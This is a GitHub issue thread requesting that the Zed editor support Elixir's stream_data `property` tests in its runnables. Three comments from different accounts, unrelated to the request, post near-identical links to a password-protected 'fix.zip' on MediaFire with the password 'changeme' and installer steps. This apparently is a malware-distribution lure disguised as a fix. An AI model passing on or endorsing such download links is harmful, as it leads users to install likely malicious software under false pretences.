### ISSUE TITLE
Elixir: Add support for property-based testing in tasks

### ISSUE THREAD

**Issue by cschmatzler** [zed-industries/zed#16984]
### Check for existing issues

- [X] Completed

### Describe the feature

Elixir's `runnables` query currently supports the `describe` and `test` macros.  
The library `stream_data`, which is maintained by the Elixir core team and was even slated for integration into the language, adds a third one: `property`.
Zed should recognize those and allow running tests on them.

### If applicable, add mockups / screenshots to help present your vision of the feature

![CleanShot 2024-08-28 at 09 08 18@2x](https://github.com/user-attachments/assets/d110857a-00cc-4ec8-a934-78d1908636b7)

**Comment by internet-person** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by HeinousAgenda38** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
